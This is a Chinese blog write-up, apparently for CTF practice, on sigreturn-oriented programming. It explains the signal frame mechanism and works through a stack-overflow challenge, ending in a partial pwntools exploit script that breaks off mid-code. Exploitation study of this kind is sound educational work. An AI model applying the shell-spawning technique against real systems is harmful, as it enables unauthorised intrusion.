



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="" href="https://yhuanhuan01.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="" href="https://yhuanhuan01.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="" href="https://yhuanhuan01.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="rop,srop" />


<link rel="canonical" href="https://yhuanhuan01.github.io/2023/08/03/srop/">



  <title>
srop - 技巧 - PWN的学习 |
yhuanhuan =  = 不在能知，乃在能行</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">srop
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-08-03 22:51:25">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-08-03T22:51:25+08:00">2023-08-03</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>5.4k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>5 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">yhuanhuan</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/04/7d2TnbNruofPsl1.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/jDNXms1oWOKuYIM.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/KwJG42PtjmEyikW.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/8XHxYgIEC6JWoSP.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/joXBNHK1fvpxLkY.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/04/qoxySlnh7UTYwsD.png"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" itemprop="item" rel="index" title="分类于 PWN的学习"><span itemprop="name">PWN的学习</span></a>
<meta itemprop="position" content="1" /></span>
<i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" itemprop="item" rel="index" title="分类于 技巧"><span itemprop="name">技巧</span></a>
<meta itemprop="position" content="2" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://yhuanhuan01.github.io/2023/08/03/srop/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/huanhuan.png">
    <meta itemprop="name" content="yhuanhuan">
    <meta itemprop="description" content="不在能知，乃在能行, 欢迎来到Huan的笔记空间~~~~~~🌸">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="srop"><a class="markdownIt-Anchor" href="#srop">#</a> srop</h1>
<h2 id="srop原理"><a class="markdownIt-Anchor" href="#srop原理">#</a> srop 原理</h2>
<h3 id="signal-机制"><a class="markdownIt-Anchor" href="#signal-机制">#</a> signal 机制 <span class="exturl" data-url="aHR0cHM6Ly9jdGYtd2lraS5vcmcvcHduL2xpbnV4L3VzZXItbW9kZS9zdGFja292ZXJmbG93L3g4Ni9hZHZhbmNlZC1yb3Avc3JvcC8jc2lnbmFs">¶</span></h3>
<p>signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般，我们也称其为软中断信号，或者软中断。比如说，进程之间可以通过系统调用 kill 来发送软中断信号。一般来说，信号机制常见的步骤如下图所示：</p>
<p><img data-src="/img/srop/ProcessOfSignalHandlering.png" alt="Process of Signal Handlering"></p>
<ol>
<li>内核向某个进程发送 signal 机制，该进程会被暂时挂起，进入内核态。</li>
<li>内核会为该进程保存相应的上下文，<strong>主要是将所有寄存器压入栈中，以及压入 signal 信息，以及指向 sigreturn 的系统调用地址</strong>。此时栈的结构如下图所示，我们称 ucontext 以及 siginfo 这一段为 Signal Frame。** 需要注意的是，这一部分是在用户进程的地址空间的。** 之后会跳转到注册过的 signal handler 中处理相应的 signal。因此，当 signal handler 执行完之后，就会执行 sigreturn 代码。</li>
</ol>
<p>对于 signal Frame 来说，会因为架构的不同而有所区别，这里给出分别给出 x86 以及 x64 的 sigcontext</p>
<ul>
<li>x86</li>
</ul>
<figure class="highlight c"><figcaption data-lang="c"><span>c</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">struct</span> <span class="token class-name">sigcontext</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="3"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> gs<span class="token punctuation">,</span> __gsh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> fs<span class="token punctuation">,</span> __fsh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="5"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> es<span class="token punctuation">,</span> __esh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> ds<span class="token punctuation">,</span> __dsh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> edi<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> esi<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> ebp<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> esp<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> ebx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="12"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> edx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="13"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> ecx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="14"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> eax<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="15"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> trapno<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="16"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> err<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="17"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> eip<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="18"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> cs<span class="token punctuation">,</span> __csh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="19"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> eflags<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="20"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> esp_at_signal<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="21"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> ss<span class="token punctuation">,</span> __ssh<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="22"></td><td><pre>  <span class="token keyword">struct</span> <span class="token class-name">_fpstate</span> <span class="token operator">*</span> fpstate<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="23"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> oldmask<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="24"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> cr2<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="25"></td><td><pre><span class="token punctuation">&#125;</span><span class="token punctuation">;</span></pre></td></tr></table></figure><ul>
<li>x64</li>
</ul>
<figure class="highlight c"><figcaption data-lang="c"><span>c</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">struct</span> <span class="token class-name">_fpstate</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="3"></td><td><pre>  <span class="token comment">/* FPU environment matching the 64-bit FXSAVE layout.  */</span></pre></td></tr><tr><td data-num="4"></td><td><pre>  __uint16_t        cwd<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="5"></td><td><pre>  __uint16_t        swd<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>  __uint16_t        ftw<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>  __uint16_t        fop<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>  __uint64_t        rip<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>  __uint64_t        rdp<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre>  __uint32_t        mxcsr<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>  __uint32_t        mxcr_mask<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="12"></td><td><pre>  <span class="token keyword">struct</span> <span class="token class-name">_fpxreg</span>    _st<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="13"></td><td><pre>  <span class="token keyword">struct</span> <span class="token class-name">_xmmreg</span>    _xmm<span class="token punctuation">[</span><span class="token number">16</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="14"></td><td><pre>  __uint32_t        padding<span class="token punctuation">[</span><span class="token number">24</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="15"></td><td><pre><span class="token punctuation">&#125;</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="16"></td><td><pre></pre></td></tr><tr><td data-num="17"></td><td><pre><span class="token keyword">struct</span> <span class="token class-name">sigcontext</span></pre></td></tr><tr><td data-num="18"></td><td><pre><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="19"></td><td><pre>  __uint64_t r8<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="20"></td><td><pre>  __uint64_t r9<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="21"></td><td><pre>  __uint64_t r10<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="22"></td><td><pre>  __uint64_t r11<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="23"></td><td><pre>  __uint64_t r12<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="24"></td><td><pre>  __uint64_t r13<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="25"></td><td><pre>  __uint64_t r14<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="26"></td><td><pre>  __uint64_t r15<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="27"></td><td><pre>  __uint64_t rdi<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="28"></td><td><pre>  __uint64_t rsi<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="29"></td><td><pre>  __uint64_t rbp<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="30"></td><td><pre>  __uint64_t rbx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="31"></td><td><pre>  __uint64_t rdx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="32"></td><td><pre>  __uint64_t rax<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="33"></td><td><pre>  __uint64_t rcx<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="34"></td><td><pre>  __uint64_t rsp<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="35"></td><td><pre>  __uint64_t rip<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="36"></td><td><pre>  __uint64_t eflags<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="37"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> cs<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="38"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> gs<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="39"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> fs<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="40"></td><td><pre>  <span class="token keyword">unsigned</span> <span class="token keyword">short</span> __pad0<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="41"></td><td><pre>  __uint64_t err<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="42"></td><td><pre>  __uint64_t trapno<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="43"></td><td><pre>  __uint64_t oldmask<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="44"></td><td><pre>  __uint64_t cr2<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="45"></td><td><pre>  __extension__ <span class="token keyword">union</span></pre></td></tr><tr><td data-num="46"></td><td><pre>    <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="47"></td><td><pre>      <span class="token keyword">struct</span> <span class="token class-name">_fpstate</span> <span class="token operator">*</span> fpstate<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="48"></td><td><pre>      __uint64_t __fpstate_word<span class="token punctuation">;</span></pre></td></tr><tr><td data-num="49"></td><td><pre>    <span class="token punctuation">&#125;</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="50"></td><td><pre>  __uint64_t __reserved1 <span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="51"></td><td><pre><span class="token punctuation">&#125;</span><span class="token punctuation">;</span></pre></td></tr></table></figure><ol start="3">
<li>signal handler 返回后，内核为执行 sigreturn 系统调用，为该进程恢复之前保存的上下文，其中包括将所有压入的寄存器，重新 pop 回对应的寄存器，最后恢复进程的执行。其中，**32 位的 sigreturn 的调用号为 <u>119(0x77)</u>，64 位的系统调用号为 <u>15(0xf)</u></li>
</ol>
<h2 id="攻击原理"><a class="markdownIt-Anchor" href="#攻击原理">#</a> 攻击原理</h2>
<p>仔细回顾一下内核在 signal 信号处理的过程中的工作，我们可以发现，内核主要做的工作就是为进程保存上下文，并且恢复上下文。这个主要的变动都在 Signal Frame 中。但是需要注意的是：</p>
<ul>
<li>Signal Frame 被保存在用户的地址空间中，所以用户是可以读写的。</li>
<li>由于内核与信号处理程序无关 (kernel agnostic about signal handlers)，它并不会去记录这个 signal 对应的 Signal Frame，所以当执行 sigreturn 系统调用时，此时的 Signal Frame 并不一定是之前内核为用户进程保存的 Signal Frame。</li>
</ul>
<h3 id="获取-shell"><a class="markdownIt-Anchor" href="#获取-shell">#</a> 获取 shell</h3>
<p>首先，我们假设攻击者可以控制用户进程的栈，那么它就可以伪造一个 Signal Frame，如下图所示，这里以 64 位为例子，给出 Signal Frame 更加详细的信息</p>
<p><img data-src="/img/srop/srop-example-1.png" alt="signal2-stack"></p>
<p>当系统执行完 sigreturn 系统调用之后，会执行一系列的 pop 指令以便于恢复相应寄存器的值，当执行到 rip 时，就会将程序执行流指向 syscall 地址，根据相应寄存器的值，此时，便会得到一个 shell。___(相当于还原我们调好的寄存器的值)</p>
<h3 id="system-call-chains"><a class="markdownIt-Anchor" href="#system-call-chains">#</a> system call chains</h3>
<p>需要指出的是，上面的例子中，我们只是单独的获得一个 shell。有时候，我们可能会希望执行一系列的函数。我们只需要做两处修改即可</p>
<ul>
<li><strong>控制栈指针。</strong></li>
<li><strong>把原来 rip 指向的 <code>syscall</code>  gadget 换成 <code>syscall; ret</code>  gadget。</strong></li>
</ul>
<p>如下图所示 ，这样当每次 syscall 返回的时候，栈指针都会指向下一个 Signal Frame。因此就可以执行一系列的 sigreturn 函数调用。</p>
<p><img data-src="/img/srop/srop-example-2.png" alt="signal2-stack"></p>
<h3 id="后续"><a class="markdownIt-Anchor" href="#后续">#</a> 后续 <span class="exturl" data-url="aHR0cHM6Ly9jdGYtd2lraS5vcmcvcHduL2xpbnV4L3VzZXItbW9kZS9zdGFja292ZXJmbG93L3g4Ni9hZHZhbmNlZC1yb3Avc3JvcC8jXzM=">¶</span></h3>
<p>需要注意的是，我们在构造 ROP 攻击的时候，需要满足下面的条件</p>
<ul>
<li><strong>可以通过栈溢出来控制栈的内容</strong></li>
<li>需要知道相应的 **<u>地址</u>**
<ul>
<li><strong>&quot;/bin/sh&quot;</strong></li>
<li><strong>Signal Frame</strong></li>
<li><strong>syscall</strong></li>
<li><strong>sigreturn</strong></li>
</ul>
</li>
<li>需要有够大的空间来塞下整个 sigal frame</li>
</ul>
<p>此外，关于 sigreturn 以及 syscall;ret 这两个 gadget 在上面并没有提及。提出该攻击的论文作者发现了这些 gadgets 出现的某些地址：</p>
<h2 id="一道例题"><a class="markdownIt-Anchor" href="#一道例题">#</a> 一道例题</h2>
<h3 id="检查"><a class="markdownIt-Anchor" href="#检查">#</a> 检查</h3>
<p><img data-src="/img/srop/image-20230803220602093.png" alt="image-20230803220602093"></p>
<p><img data-src="/img/srop/image-20230803220635434.png" alt="image-20230803220635434"></p>
<p>发现输入很少字符，程序就崩溃。堆栈不可执行。</p>
<h3 id="ida"><a class="markdownIt-Anchor" href="#ida">#</a> IDA</h3>
<p><img data-src="/img/srop/image-20230803220825554.png" alt="image-20230803220825554"></p>
<p><img data-src="/img/srop/image-20230803220903459.png" alt="image-20230803220903459"></p>
<p><img data-src="/img/srop/image-20230803220926236.png" alt="image-20230803220926236"></p>
<p>mian 函数进入 vuln，很容易发现 vuln 函数调用 sys_read 和 sys_write 系统调用函数。其中在 buf 中有漏洞点。并发现 gadgets 中有</p>
<pre><code class="language-commonlisp"># 00000000004004DA                 mov     rax, 0Fh
</code></pre>
<p>所以很明显可以进行 srop。</p>
<p>srop 达成攻击的条件是一下内容：</p>
<ul>
<li><strong>可以通过栈溢出来控制栈的内容</strong></li>
<li>需要知道相应的 **<u>地址</u>**
<ul>
<li><strong>&quot;/bin/sh&quot;</strong></li>
<li><strong>Signal Frame</strong></li>
<li><strong>syscall</strong></li>
<li><strong>sigreturn</strong></li>
</ul>
</li>
<li>需要有够大的空间来塞下整个 sigal frame</li>
</ul>
<p>检查字符串并没有 binsh，所以我们可以用 sys_read 读入，去泄露栈的基址，然后去计算 binsh 在栈中的偏移。因为虽然程序远程和本地加载不同，但是 bin/sh 读入的偏移是相同的。根据这个原理，我们去计算本地调试的 /bin/sh 的偏移</p>
<p>但这题我们并不知的去如何泄露栈的基址，那该咋办。凡事先调试再说。</p>
<p>main 函数之前记录 rsi</p>
<p><img data-src="/img/srop/image-20230803222622304.png" alt="image-20230803222622304"></p>
<p>输入 /bin/sh 记录 rsi</p>
<p><img data-src="/img/srop/image-20230803222733528.png" alt="image-20230803222733528"></p>
<p>从 rsi 中，我们能得到 bin/sh 在栈中的偏移 —— 0x7fffffffddf8 - 0x7fffffffdce0</p>
<p><img data-src="/img/srop/image-20230803223305868.png" alt="image-20230803223305868"></p>
<p>从这里我们就能发现 ——write 打印出 0x30 个字节，可以看出从低地址开始打印 0x20 个字节后 0x8 就是栈基址</p>
<p>所以通过 write 函数能打印出 libc 栈基址</p>
<p>打印完栈基址我们就能通过偏移计算出 binsh 的基址了。</p>
<p>思路有了，直接上 exp</p>
<h3 id="exp"><a class="markdownIt-Anchor" href="#exp">#</a> exp</h3>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token comment"># from LibcSearcher import*</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment"># from ctypes import *</span></pre></td></tr><tr><td data-num="4"></td><td><pre>context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment">#r = remote('node2.anna.nssctf.cn',28450)</span></pre></td></tr><tr><td data-num="7"></td><td><pre></pre></td></tr><tr><td data-num="8"></td><td><pre>r <span class="token operator">=</span> gdb<span class="token punctuation">.</span>debug<span class="token punctuation">(</span><span class="token string">'./PWN3'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token comment"># r = process('./PWN3')</span></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token comment"># libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')</span></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token comment"># libc = ELF('/home/f145h/Desktop/libs/2.23-0ubuntu11.3_amd64/libc.so.6')</span></pre></td></tr><tr><td data-num="12"></td><td><pre>elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./PWN3'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token comment"># ld-linux-x86-64.so.2</span></pre></td></tr><tr><td data-num="14"></td><td><pre><span class="token comment"># srand = libc.srand (libc.time (0)) #设置种子</span></pre></td></tr><tr><td data-num="15"></td><td><pre></pre></td></tr><tr><td data-num="16"></td><td><pre>se      <span class="token operator">=</span> <span class="token keyword">lambda</span> data               <span class="token punctuation">:</span>r<span class="token punctuation">.</span>send<span class="token punctuation">(</span>data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="17"></td><td><pre>sa      <span class="token operator">=</span> <span class="token keyword">lambda</span> delim<span class="token punctuation">,</span>data         <span class="token punctuation">:</span>r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span>delim<span class="token punctuation">,</span> data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="18"></td><td><pre>sl      <span class="token operator">=</span> <span class="token keyword">lambda</span> data               <span class="token punctuation">:</span>r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="19"></td><td><pre>sla     <span class="token operator">=</span> <span class="token keyword">lambda</span> delim<span class="token punctuation">,</span>data         <span class="token punctuation">:</span>r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span>delim<span class="token punctuation">,</span> data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="20"></td><td><pre>sea     <span class="token operator">=</span> <span class="token keyword">lambda</span> delim<span class="token punctuation">,</span>data         <span class="token punctuation">:</span>r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span>delim<span class="token punctuation">,</span> data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="21"></td><td><pre>rc      <span class="token operator">=</span> <span class="token keyword">lambda</span> numb<span class="token operator">=</span><span class="token number">4096</span>          <span class="token punctuation">:</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span>numb<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="22"></td><td><pre>rl      <span class="token operator">=</span> <span class="token keyword">lambda</span>                    <span class="token punctuation">:</span>r<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="23"></td><td><pre>ru      <span class="token operator">=</span> <span class="token keyword">lambda</span> delims             <span class="token punctuation">:</span>r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span>delims<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="24"></td><td><pre>uu32    <span class="token operator">=</span> <span class="token keyword">lambda</span> data               <span class="token punctuation">:</span>u32<span class="token punctuation">(</span>data<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'\0'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="25"></td><td><pre>uu64    <span class="token operator">=</span> <span class="token keyword">lambda</span> data               <span class="token punctuation">:</span>u64<span class="token punctuation">(</span>data<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\0'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>lic 	<span class="token operator">=</span> <span class="token keyword">lambda</span> data               <span class="token punctuation">:</span>uu64<span class="token punctuation">(</span>ru<span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre>pack    <span class="token operator">=</span> <span class="token keyword">lambda</span> <span class="token builtin">str</span><span class="token punctuation">,</span> addr          <span class="token punctuation">:</span>p32<span class="token punctuation">(</span>addr<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="28"></td><td><pre>padding <span class="token operator">=</span> <span class="token keyword">lambda</span> lenth              <span class="token punctuation">:</span><span class="token string">b'F145H'</span><span class="token operator">*</span><span class="token punctuation">(</span>lenth<span class="token operator">//</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">b'F'</span><span class="token operator">*</span><span class="token punctuation">(</span>lenth <span class="token operator">%</span> <span class="token number">5</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="29"></td><td><pre></pre></td></tr><tr><td data-num="30"></td><td><pre>vuln <span class="token operator">=</span> <span class="token number">0x4004ED</span></pre></td></tr><tr><td data-num="31"></td><td><pre>pl <span class="token operator">=</span> <span class="token string">b'/bin/sh\x00'</span><span class="token operator">*</span><span class="token number">2</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>vuln<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="32"></td><td><pre><span class="token comment"># gdb.attach(r)</span></pre></td></tr><tr><td data-num="33"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'传输/bin/sh之前======>'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="34"></td><td><pre><span class="token comment"># pause()</span></pre></td></tr><tr><td data-num="35"></td><td><pre>sl<span class="token punctuation">(</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="36"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'传输/bin/sh之后======>'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="37"></td><td><pre><span class="token comment"># pause()</span></pre></td></tr><tr><td 